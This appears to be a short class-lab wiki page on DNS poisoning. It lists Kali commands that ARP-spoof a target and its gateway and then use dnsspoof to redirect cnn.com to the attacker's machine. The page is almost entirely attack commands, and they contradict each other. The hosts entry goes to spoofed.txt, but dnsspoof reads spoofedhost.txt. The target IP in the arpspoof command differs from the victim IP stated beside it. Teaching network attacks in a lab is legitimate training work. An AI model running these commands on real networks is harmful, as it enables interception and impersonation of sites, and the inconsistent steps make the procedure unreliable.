0.00 Class 3 Lab2 DNS Poisoning V2 - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

Set up Kali box

ifconfig eth0 promisc echo 1 > /proc/sys/net/ipv4/ip_forward touch spoofedhost.txt echo '192.168.1.105 cnn.com' > ~/spoofed.txt [Kali Ip is 192.168.1.105]

Start by ARP spoofing

sudo arpspoof -i eth0 -t 192.168.1.114 192.168.1.1 [Machine under attack IP is 192.168.1.115 GW is 192.168.1.1] sudo dnsspoof -f ~/spoofedhost.txt